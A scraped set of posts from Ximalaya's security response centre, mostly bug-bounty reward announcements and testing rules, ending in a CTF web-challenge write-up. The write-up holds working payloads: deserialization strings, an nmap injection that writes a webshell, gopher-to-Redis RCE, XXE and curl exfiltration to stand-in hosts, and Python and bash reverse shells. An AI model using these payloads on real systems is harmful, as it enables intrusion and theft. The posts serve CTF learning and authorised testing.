XMSRC 2025年终奖励公告

阅读原文

跳转微信打开

XMSRC 2025年中致谢公告

亲爱的白帽子伙伴们：

      时光匆匆，又至年中。2025年的上半年，我们在各位白帽子的支持下，共同构建了更加坚固的安全防线。一路走来，感谢每一位师傅们在漏洞挖掘、问题协作、技术创新中付出的努力和汗水～

      为了感谢大家的辛勤付出，我们特别为上半年排行前十的师傅准备了一份端午礼盒，向你们表示最诚挚的谢意！榜单前三名将额外获得一个保温杯盲盒～

榜单如下

      恭喜上榜的师傅们～请于本周三19:00前联系运营预留收货地址，礼盒将于本周内邮寄～

      再次感谢每一位白帽子持续在XMSRC平台上贡献安全智慧。不论是寻找高危漏洞，还是提出优化建议，你们都为企业的安全建设提供了强大的力量。而这份努力，也不断激励我们提供更优质的平台服务、搭建更高效的沟通桥梁。

    未来，XMSRC期待与更多白帽子一起，披荆斩棘，继续守护网络空间的安全与稳定！

        端午礼盒内含多功能时尚包（颜色随机）， 特制端午粽*2，喜马限定款挂件，扫码查看更多详情～

阅读原文

跳转微信打开

春归万物生，漏洞无处藏！值此安全焕新季，SRC平台开启「春日双倍活动」，诚邀白帽子聚焦服务器、数据泄漏高危漏洞，提交有效漏洞即可享双倍奖励！用技术唤醒安全生机，让挖洞更有“春意”！

阅读原文

跳转微信打开

2024年终奖和新年礼盒来啦，快来查收～

阅读原文

跳转微信打开

活动内容

活动时间：

2024年10月22日00:00 – 2024年11月22日24:00

活动范围：

活动期间提交有效漏洞且漏洞评级为中危及以上，均可获得1.5倍安全币奖励(贡献值不翻倍)

  *注:报告奖励为附加奖励不算在翻倍内

提交地址：

https://security.ximalaya.com/

注意事项

❗️禁止社会工程学、钓鱼等非技术性测试。

❗️禁止对网站后台和项目使用大规模扫描器。

❗️禁止进行可能引起业务异常运行的测试，例如：IIS的拒绝服务等可导致拒  绝服务的漏洞测试以及DDOS攻击。

❗️测试漏洞仅限证明性测试，严禁破坏性测试，严禁权限维持、植入后门等行为，若无意中造成危害，应及时报告。

❗️对于一切违反测试规范的行为，XMSRC保留追究其法律责任的权利。

❗️XMSRC对本次活动相关规则保留最终解释权

据《喜马拉雅SRC漏洞处理规则及评分V3.0》中所规定的漏洞评级标准进行漏洞评级

          

阅读原文

跳转微信打开

春日专项众测活动重磅来袭，诚邀各位师傅参加～

春日好运

正在派送

HAPPY SPRING

XMSRC春日专项众测活动重磅来袭

诚邀各位师傅参加～

( ＞◡❛)

活动规则

活动时间

2024.04.01-2024.04.30

活动范围

  1、用户敏感信息泄露，需包含三个或三个以上敏感信息字段。

  2、可获取服务器权限的漏洞，包括但不限于代码执行、远程命令执行、可执行命令的sql注入等。

    活动期间提交上述范围且被评为有效漏洞的，均可获得2倍安全币奖励(贡献值不翻倍)。

                 注:报告奖励为附加奖励不算在翻倍内

漏洞提交

XMSRC官网：https://security.ximalaya.com

更

多

·

事

项

根据《喜马拉雅SRC漏洞处理规则及评分V3.0》中所规定的漏洞评级标准进行漏洞评级

注意事项

• 禁止社会工程学、钓鱼等非技术性测试。

• 禁止利用漏洞私自保存用户个人信息、网站源码等敏感数据。
  

• 发现可入侵漏洞后，需立即上报运营或邮件同步XMSRC获得授权，不得私自或未授权对内网进行大量扫描、横向移动、植入后门等操作。
  

• 禁止对网站后台和项目使用大规模扫描器。

• 禁止进行可能引起业务异常运行的测试，例如:IIS的拒绝服务等可导致拒绝服务的漏洞测试以及DDOS攻击。

• 对于一切违反测试规范的行为，XMSRC保留追究其法律责任的权利。

• 活动解释权归我司所有。

扫码查看更多详情

官方邮箱：security@ximalaya.com

阅读原文

跳转微信打开

叮！您有一份年终奖请查收～

   2023年圆满收官啦～

感谢各位白帽子及安全团队对喜马安全的支持与关注

XMSRC向你们表示由衷的感谢！

以下是2023年度上榜的TOP10师傅

阅读原文

跳转微信打开

新规则奖励升级，叠加1.5倍奖励活动，单个漏洞最高至4500元！

阅读原文

跳转微信打开

​七夕就要到了，师傅们快来和喜马君一起过节挖！限时一月，最高双倍奖励等你来拿～

阅读原文

跳转微信打开

【春日活动】限时1个月，赢1.5倍奖励！

XMSRC

邀你一起踏春啦～

_XIMALAYA SECURITY_

正值踏春之际

我们特别发起漏洞奖励活动

回馈师傅们的辛勤付出

感谢各位对喜马安全的支持和关注～

快喊上你的小伙伴一起来挑战奖金库吧！

活动时间

2023年4月5日 9:00

～

2023年5月5日 21:00

*测试时间仅限每天9:00-21:00

活动规则

活动期间提交有效漏洞者

均可获得1.5倍安全币奖励

（贡献值不翻倍）

 *要能证明实际危害，小程序和隐私合规问题不在本次活动收集范围内～

测试范围

    web（包括但不限于）：

                    *.ximalaya.com

                    *.qingxuetang.com

                    *.himalaya.com

                    *.qijizuopin.com

                    *.ximalayaos.com

                    *.xima.tv

                    *.xiaoyastar.com

        

     app（仅限以下）：

                    喜马拉雅

                    喜马拉雅极速版

                    喜马拉雅儿童

                    轻学堂

                    奇迹文学

提交漏洞

https://security.ximalaya.com/

更多

   禁止对网站后台和项目使用大规模扫描器。

   禁止进行可能引起业务异常运行的测试，例如：IIS的拒绝服务等可导致拒绝服务的漏洞测试以及DDOS攻击。
    对于一切违反测试规范的行为，XMSRC保留追究其法律责任的权利。

附录

 1、【春日活动】限时1个月，赢1.5倍奖励！https://security.ximalaya.com/announcement/msg/118

 2、喜马拉雅SRC漏洞处理规则及评分标准v2.1

https://security.ximalaya.com/announcement/msg/54

 3、SRC行业安全测试规范https://security.ximalaya.com/announcement/msg/46

关注我们

感谢您的关注～

官方邮箱｜security@ximalaya.com

阅读原文

跳转微信打开

@所有人 您有一份喜马SRC个人年终奖励待领取

过去的一年

XMSRC收到了广大白帽子的漏洞轰炸&花式催审

感谢各位白帽子的支持与厚爱！

经过一年的激烈角逐，我们的年度榜单出来啦，

当然还有大家关心的年度奖励结果啦！

快来看看榜单吧～

感谢大家在2021年，

为喜马拉雅安全做出的每一份付出与努力！

喜马因为有你们才更安全！

世界因为有你们才更温暖！

XMSRC将为以上白帽子颁发奖励～

感谢所有白帽子对喜马拉雅安全的关注与支持！

2022年，让我们继续携手同行，保卫喜马安全～

期待优秀的你们都能登上喜马榜单！

附录：

欢迎扫码关注～

阅读原文

跳转微信打开

年度奖励计划&新年三倍活动

SRC年度奖励计划

&

新年三倍活动

过去的一年，

XMSRC收到了数百个有效漏洞，

感谢各位白帽子的支持与厚爱。

感谢大家在2020年

为喜马拉雅安全做出的每一份付出与努力！

01 SRC年度奖励计划

为了更好的回馈白帽子对我们的支持和付出，

喜马拉雅安全应急响应中心奖励升级，

自2021年1月起，

增设年终奖励计划。

新的一年，

喜马拉雅SRC将在你们的陪伴下继续成长，

在这里祝愿大家在新的一年都

牛转乾坤，属你最牛！

年/终/奖/励/规/则

年度榜单第一 5000元

年度榜单第二 2000元

年度榜单第三至第五 1000元

注意：

1、年排行榜中，贡献值 >= 50

2、若贡献值大于50的不足5人，则从上而下开始分配

例如：两人满足条件，则第一人获得5000，第二人获得2000，剩余空置。

3、年终计划于2021.1开始执行。

02 新年三倍活动

与此同时，

新年年货也给大家安排上。

2021年1月21日起至2021年2月5日18点，

最高3倍漏洞奖励，

喜马拉雅SRC

陪你共度小年，迎接新年。

新/年/活/动/须/知

01

活动时间

2021.1.21 - 2021.2.5 18:00

02

活动范围

参见《喜马拉雅SRC漏洞处理规则及评分标准v2.1》

03

活动规则

1.  有效高危及以上漏洞可得3倍奖励

2.  有效中低危漏洞2倍奖励

3.  前五名(贡献值> =10)额外赠送喜马拉雅年货礼盒

附：

1. SRC行业安全测试规范

https://security.ximalaya.com/announcement/msg/46

2. 喜马拉雅SRC漏洞处理规则及评分标准v2.1

https://security.ximalaya.com/announcement/msg/54

喜马拉雅安全响应平台

扫码关注我们

阅读原文

跳转微信打开

附：

喜马拉雅安全应急响应中心
https://security.ximalaya.com/
SRC行业安全测试规范
https://security.ximalaya.com/announcement/msg/46

阅读原文

跳转微信打开

文末福利来啦👇

关注【火大表姐】和【喜马拉雅安全响应平台】，并且转发文章到朋友圈，即可参与抽奖～

[喜马拉雅安全应急响应中心]（https://security.ximalaya.com/）

[漏洞评分标准]（https://security.ximalaya.com/announcement/msg/47）

阅读原文

跳转微信打开

[端午活动]挖洞三倍奖励请查收

[喜马拉雅安全应急响应中心]（https://security.ximalaya.com/）

[漏洞评分标准]（https://security.ximalaya.com/announcement/msg/47）

阅读原文

跳转微信打开

用一天时间写完的网鼎杯四组Web题的总结，如有差错还请师傅们斧正

首先感谢国家网信相关单位及i春秋等公司对大赛的大力支持，喜马拉雅作为玄武组的一份子积极参加了比赛，并在赛后回顾和复现了赛题中出现的相关技术。作者目前也是正在边练边学的小朋友，如有差错还请师傅们交流斧正。

同时希望大家能多多关注本公众号，近期还会继续发布SRC的福利活动和优质的技术文章。

被微信公众号吃掉了的脚本链接，均可通过 阅读原文 或如下网址找到找到

https://github.com/hosch3n/expload

AreUSerialz

考察PHP反序列化、PHP弱类型比较

index.php 接收GET方法str参数的值，并将值传入is_valid函数，如果不包含不可见特殊字符，则对其进行反序列化

FileHandler类的三个protected属性分别为op、filename、content，构造函数对三个属性进行初始化赋值后调用process方法

由于op属性为"1"，继续调用write方法，若写入的内容不超过100个字符，则利用file_put_contents函数写文件，并返回状态消息给output方法输出到页面上

如果满足$this->op == "2"，就会调用read方法，利用file_get_contents函数读文件，并返回文件内容给output方法输出到页面上

最后析构函数如果发现满足$this->op === "2"就会改回"1"，将content属性置空并再次调用process方法

这里反序列化直接可控的类属性是protected类型，在序列化后会包含不可见字符%00，不但过不了is_valid函数的检查，在php版本小于5.3.4时还可能会导致截断

由于析构函数会将content属性置空，所以绕过op参数检查后，输出文件内容实际上是通过析构函数（而非构造函数）中的process方法调用的。但php构造函数与析构函数工作路径可能会不一致，这也就是有些环境直接读当前目录下的flag.php读不到东西的原因

测试了linux下php的cli模式、apache php_module模式与nginx FastCGI模式，结果同上。windows下看到b1ind师傅发的图，析构函数的工作目录是在apache目录下

因此想成功读到flag，需要将反序列化默认生成的不转义二进制的s字符串类型，改为支持用十六进制表示S字符串类型绕过检查。在php版本高于7.1时，也可以直接利用public覆盖掉private绕过检查

利用php弱类型比较满足2 == "2"，但不满足强类型比较2 === "2"的特性，绕过析构函数的拦截

然后按道理应该先从/proc/self/cmdline中获取httpd配置文件路径，再从/web/config/httpd.conf进一步获取web目录的绝对路径，利用绝对路径读/web/html/flag.php的内容。。。但是线上环境相对路径就能直接读出来了

<?php
class FileHandler {
    protected $op = 2;
    protected $filename = "/var/www/html/flag.php"; # ctfhub环境
    protected $content;
}
$a = new FileHandler();
$b = urlencode(serialize($a));
$b = str_replace("s", "S", $b);
$b = str_replace("%00", "\\00", $b);
echo $b;
# ?str=O%3A11%3A%22FileHandler%22%3A3%3A%7BS%3A5%3A%22\00%2A\00op%22%3Bi%3A2%3BS%3A11%3A%22\00%2A\00filename%22%3BS%3A22%3A%22/var/www/html/flag.php%22%3BS%3A10%3A%22\00%2A\00content%22%3BN%3B%7D

<?php
class FileHandler {
    public $op;
    public $filename;
    public $content;
}
$a = new FileHandler();
$a->op = 2;
$a->filename = "flag.php";
echo urlencode(serialize($a));
# ?str=O%3A11%3A%22FileHandler%22%3A3%3A%7Bs%3A2%3A%22op%22%3Bi%3A2%3Bs%3A8%3A%22filename%22%3Bs%3A8%3A%22flag.php%22%3Bs%3A7%3A%22content%22%3BN%3B%7D

Unfinish

考察PHP二次注入

题目与2018年时相同，原理可参考七月火师傅的博客文章：

https://mochazz.github.io/2018/08/23/2018网鼎杯第二场Web题解/#unfinished

这里同时放一个自己撸的渣脚本

https://github.com/hosch3n/expload/blob/master/PHP-Tricks/unfinish.py

nmap

考察PHP的escapeshellxxx函数单引号逃逸、nmap参数注入写shell

2018年时安恒也出过这题，原理是escapeshellarg与escapeshellcmd的使用顺序不当会导致参数逃逸，分析参见PHP escapeshellarg()+escapeshellcmd() 之殇

https://paper.seebug.org/164/

在此基础上结合nmap的输出参数写shell，只是这里存在代码waf会拦截php关键字，所以需要稍微绕过一下

# 写webshell
' -oG a.phtml <?=eval($_POST[911])?> '
# 直接读文件
' -o a.txt -iL ../../../../../../../flag '

phpweb

考察PHP利用反序列化绕WAF

对时间页抓包可以看到两个参数：func=date&p=Y-m-d+h%3Ai%3As+a，猜测存在RCE，但是执行代码/命令的函数基本都被WAF了

fuzz发现file_get_contents可用，用它把index.php下载下来

func=file_get_contents&p=index.php

通过in_array($func,$disable_fun)卡了很多敏感函数，但是还漏了用于反序列化的unserialize，于是就可以通过序列化后的Payload来绕过WAF

<?php
class Test {
    public $p;
    public $func;
}
$a = new Test();
$a->func = "system";
$a->p = "ls -al /";
echo urlencode(serialize($a));
# func=unserialize&p=O%3A4%3A%22Test%22%3A2%3A%7Bs%3A1%3A%22p%22%3Bs%3A8%3A%22ls+-al+%2F%22%3Bs%3A4%3A%22func%22%3Bs%3A6%3A%22system%22%3B%7D

或者利用形如\system的命名空间形式绕过WAF

js_on

考察PHP的JWT签名后绕WAF注入

开局一个表单，顺手admin,admin就进去了，拿到一个key

回头来试注入会被问候到。。。就不贴图了

利用<>置空特性和JWT的key签名后绕过WAF注入，表里没东西直接load_file读根目录下的flag，再贴一个自己撸的辣鸡脚本

https://github.com/hosch3n/expload/blob/master/PHP-Tricks/js_on.py

ssrfme

考察PHP的SSRF绕过IP限制后，利用gopher协议打Redis授权后的主从同步RCE

给了源码，提示本地访问hint.php

开头限制了协议只能是http|https|gopher|dict中的，然后卡了一下本地和内网IP，考虑到参赛队数量估计没有更深的内网环境

先利用?url=http://foo@127.0.0.1:80@x.x/hint.php绕过IP限制（进制转换、0.0.0.0、DNS重绑定等也可以），看到提示的Redis密码为welcometowangdingbeissrfme6379

之后的思路就是利用gopher协议打需要认证的6379端口上的Redis，使其作为从机访问搭建了Rogue-MySql-Server的VPS，将VPS上编译好的exp.so拓展同步到目标上（俗称Redis主从同步RCE），这样就能直接利用Redis执行系统命令了，赛题环境弹shell总是抽风，所以直接执行cat通过Web端回显读到了flag

<?php
if($_SERVER['REMOTE_ADDR']==="127.0.0.1"){
  highlight_file(__FILE__);
}
if(isset($_POST['file'])){
  file_put_contents($_POST['file'],"<?php echo 'welcometowangdingbeissrfme6379 is root';exit();".$_POST['file']);
}

这里由于目前还没有方便的复现环境，所以就只贴一下Payload，不再干巴巴地多讲了，等CTFHub上了环境再补齐细节吧（表哥五毛拿来 $.$）

?url=http://foo@127.0.0.1:80@x.x/hint.php
?url=gopher://a@127.0.0.1:6379@x.x/_%252A2%250D%250A%25244%250D%250AAUTH%250D%250A%252430%250D%250Awelcometowangdingbeissrfme6379%250D%250A%252A3%250D%250A%25247%250D%250ASLAVEOF%250D%250A%252413%250D%250A1.1.1.1%250D%250A%25244%250D%250A7777%250D%250A%252A4%250D%250A%25246%250D%250ACONFIG%250D%250A%25243%250D%250ASET%250D%250A%25243%250D%250Adir%250D%250A%25245%250D%250A%2Ftmp%2F%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25246%250D%250Aexp.so%250D%250A%252A3%250D%250A%25246%250D%250AMODULE%250D%250A%25244%250D%250ALOAD%250D%250A%252411%250D%250A%2Ftmp%2Fexp.so%250D%250A%252A2%250D%250A%252411%250D%250Asystem.exec%250D%250A%252435%250D%250Acat%2524%257BIFS%257D%2FflagFlagFLLLLLLLLLLLLLLag%250D%250A%252A1%250D%250A%25244%250D%250APOST%250D%250A

同时安利一下用到的工具：

redis-ssrfhttps://github.com/xmsec/redis-ssrf
redis-rogue-serverhttps://github.com/n0b0dyCN/redis-rogue-server

让ssrf-redis.py的mode=3，lhost和lport填VPS上rogue-server.py监听的地址，同时将编译好的exp.so和rogue-server.py放在VPS的同一目录下，最后将生成的Payload二次编码后，通过?url=参数打过去即可，执行的命令会在Web前端回显回来

FileJava

考察Java的poi xml解析库XXE

直接访问是一个上传表单，上传任意文件后可以得到下载接口：/file_in_java/DownloadServlet?filename=

在CTFHub复盘时，尝试利用路径穿越下载/etc/passwd和/webapps/file_in_java.war会提示您要下载的资源已被删除!，所以还是老实fuzz路径寻找tomcat所在的/usr/local/tomcat/目录并下载web.xml来获取路径信息：/file_in_java/DownloadServlet?filename=../../../../../../../../../../usr/local/tomcat/webapps/file_in_java/WEB-INF/web.xml

从web.xml 中可以得知包名为cn.abc.servlet，由此便可结合servlet名，构造出能下载到相应字节码文件的路径

/usr/local/tomcat/webapps/file_in_java/WEB-INF/classes/cn/abc/servlet/UploadServlet.class
/usr/local/tomcat/webapps/file_in_java/WEB-INF/classes/cn/abc/servlet/DownloadServlet.class.class
/usr/local/tomcat/webapps/file_in_java/WEB-INF/classes/cn/abc/servlet/ListFileServlet.class

安利一个集成了多种Java反编译引擎的网站：Decompilers online，反编译后看下代码逻辑

http://www.javadecompilers.com/

DownloadServlet如果发现要下载的文件名包含flag则会返回禁止读取，UploadServlet会调用POI库解析以excel-开头、xlsx为后缀的文件

搜索org.apache.poi vuln，可以利用CVE-2014-3529读取flag文件，直接新建一个[Content_Types].xml文件，压缩为zip格式后将文件名改为形如excel-xxx.xlsx的格式

https://xz.aliyun.com/t/7272#toc-7

<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "file:///flag">
<!ENTITY % remote SYSTEM "http://公网地址/xxe.dtd">
%remote;
%all;
]>
<root>&send;</root>

在能访问到的公网地址处放入xxe.dtd

<!ENTITY % all "<!ENTITY send SYSTEM 'http://WebLog/?%file;'>">

此时直接上传excel-xxx.xlsx即可在WebLog平台收到利用XXE读到的flag

think_java

考察Java的swagger-ui接口泄漏、SQL注入、反序列化

给了部分字节码文件，反编译后看一下代码

可以看到用了swagger-ui，继续跟进/sqlDict

dbName为myapp，同时发现SQL拼接存在注入

/swagger-ui.html#/test可以方便地发起请求，抓包后尝试通过SQL注入获取信息，注意这里的#或?仅起填充分隔作用

dbName=myapp#' union select user()--+
dbName=myapp?a=1' union select group_concat(id,name,pwd) from user--+

{
"password": "admin@Rrrr_ctf_asde",
"username": "admin"
}

利用拿到的一组帐号密码通过swagger中泄漏的/common/user/login登录后，会得到一段token

{
  "Accept": "*/*",
  "Authorization": "Bearer rO0ABXNyABhjbi5hYmMuY29yZS5tb2RlbC5Vc2VyVm92RkMxewT0OgIAAkwAAmlkdAAQTGphdmEvbGFuZy9Mb25nO0wABG5hbWV0ABJMamF2YS9sYW5nL1N0cmluZzt4cHNyAA5qYXZhLmxhbmcuTG9uZzuL5JDMjyPfAgABSgAFdmFsdWV4cgAQamF2YS5sYW5nLk51bWJlcoaslR0LlOCLAgAAeHAAAAAAAAAAAXQABWFkbWlu"
}

Java环境下rO0AB开头的数据优先猜测为序列化数据的Base64编码，aced开头则优先猜测为hex编码，且这段数据可以被/common/user/current解析，所以考虑打反序列化，先对命令编码一下渡劫Runtime.getRuntime().exec()的坑

java -jar ysoserial.jar ROME 'bash -c {echo,Y3VybCBodHRwOi8vV2ViTG9nL2BjYXQgLypmbGFnKmA=}|{base64,-d}|{bash,-i}' > payload.bin

附PS版：powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc YwB1AHIAbAAgAGgAdAB0AHAAOgAvAC8AVwBlAGIATABvAGcALwBgAGMAYQB0ACAALwAqAGYAbABhAGcAKgBgAA==

import base64
filei = open("payload.bin", "rb")
fileo = open("payload.txt", "a")
bin_data = filei.read()
data = base64.b64encode(bin_data)
data = f"Bearer {data.decode('utf-8')}"
fileo.write(data)
filei.close()
fileo.close()

将生成的payoad通过/common/user/current打过去即可

picdown

考察Python的flask以及Linux相关知识点

给url参数传喜闻乐见的../../../../../../etc/passwd，可以目录穿越读到文件，尝试下载index.php报错了，继续尝试main.py成功获取源码

程序开头把/tmp/secret.txt的内容读入变量后就把文件删掉了，manager函数校验key后即可执行命令

结合题目环境猜测可能要用到Linux神奇的/proc内存接口进一步获取信息，从/proc/self/cmdline得知程序所在目录为/root/，继续fuzz发现在/proc/self/fd/3中存在一段十六进制PXR2aoaf3zuHodBEKE46B0baM5X6cgvPXMgJIfUg1z8，猜测其就是/tmp/secret.txt的内容

给/no_one_know_the_manager传key和命令执行后意识到没有回显，利用/dev/tcp反弹也没有反应，最后利用python反弹成功

/no_one_know_the_manager?key=PXR2aoaf3zuHodBEKE46B0baM5X6cgvPXMgJIfUg1z8=&shell=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",Port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"])
# /root/flag.txt

Notes

考察node.js原型链污染

直接给了部分源码，看到undefsafe这个包名就很奇奇怪怪，搜索undefsafe vuln的第一条结果就说明了其存在原型链污染

var a = require("undefsafe");
var payload = "__proto__.toString";
a({},payload,"JHU");
console.log({}.toString);

可能导致的攻击有：

1. 污染Object.prototype.toString相关操作为int等类型，导致DoS

2. 污染形如user.isAdmin的属性，导致越权

3. 污染到Object.prototype.someattr后，其被形如eval(someobject.someattr)的代码执行后，导致RCE

结合开头处显眼的const { exec } = require('child_process');来看，肯定是命令执行无误了，搜索exec快速定位到能执行命令的功能点

可以看到用了从数组中枚举的方式来获取值，并传递给exec函数利用/bin/bash'解释执行，存在被利用原型链污染后新增命令的风险，接下来只需要找到可控的输入流和调用了undefsafe的地方

这样就可以通过向/edit_note POST Payload，再访问/status触发命令执行

// 反弹Shell
id=__proto__&author=bash -i >%26 /dev/tcp/IP/Port 0>%261&raw=1
// 直接读文件
id=__proto__&author=curl WebLog/`cat /flag | base64`&raw=1

starbucket

考察AmazonS3 starbucket

直接给了个链接，访问后按flag会提示没权限。扫目录后，访问config.php可以看到报错

**Fatal error**: Uncaught Error: Class 'Aws\S3\S3Client' not found in /var/www/html/config.php:8 Stack trace: #0 {main} thrown in **/var/www/html/config.php** on line **8**

从前端接口看到用了starbucket ACL，搜索一下可以知道其存在的三种访问权限分别为public-read-write、public-read和private

signature.php会根据'https://starbucket.s3.us-east-2.amazonaws.com/userinfo/' + userid + '/info.js'中的值来判断是否加载flag，所以需要通过改acl参数为public-read-write，同时上传info.js覆写内容为{"admin":true,"avatar":"image\/default.jpg"}，在下一次请求时即可通过权限校验拿到flag

/*
signature.php?acl=public-read&key=image/

{"acl":"public-read","key":"image\/","X-Amz-Credential":"AKIAI5OBRAEU3S5TMWHA\/20200514\/us-east-2\/s3\/aws4_request","X-Amz-Algorithm":"AWS4-HMAC-SHA256","X-Amz-Date":"20200514T070533Z","Policy":"eyJleHBpcmF0aW9uIjoiMjAyMC0wNS0xNFQwODowNTozM1oiLCJjb25kaXRpb25zIjpbeyJhY2wiOiJwdWJsaWMtcmVhZCJ9LHsiYnVja2V0Ijoic3RhcmJ1Y2tldCJ9LHsia2V5IjoiaW1hZ2VcLyJ9LHsiWC1BbXotRGF0ZSI6IjIwMjAwNTE0VDA3MDUzM1oifSx7IlgtQW16LUNyZWRlbnRpYWwiOiJBS0lBSTVPQlJBRVUzUzVUTVdIQVwvMjAyMDA1MTRcL3VzLWVhc3QtMlwvczNcL2F3czRfcmVxdWVzdCJ9LHsiWC1BbXotQWxnb3JpdGhtIjoiQVdTNC1ITUFDLVNIQTI1NiJ9XX0=","X-Amz-Signature":"9e2e29e94e20253bdb6e6d4ab9b0e4af2ac1237782147a44cf3d72dbde2100b9"}
*/
fetch('./signature.php?acl=public-read-write&key=userinfo/' + userid + '/info.js').then(res => res.json()).then(json => {
            for(let key in json){ 
                $('input[name='+key+']')[0].value = json[key];
            }
})

完结撒花

文中部分思路来源于Venom战队的师傅，在此表示感谢

最后悄悄地剧透一下，XMSRC近期即将发布新的挖洞翻倍活动哦，希望大家多多支持鸭

喜马拉雅安全应急响应中心：https://security.ximalaya.com

阅读原文

跳转微信打开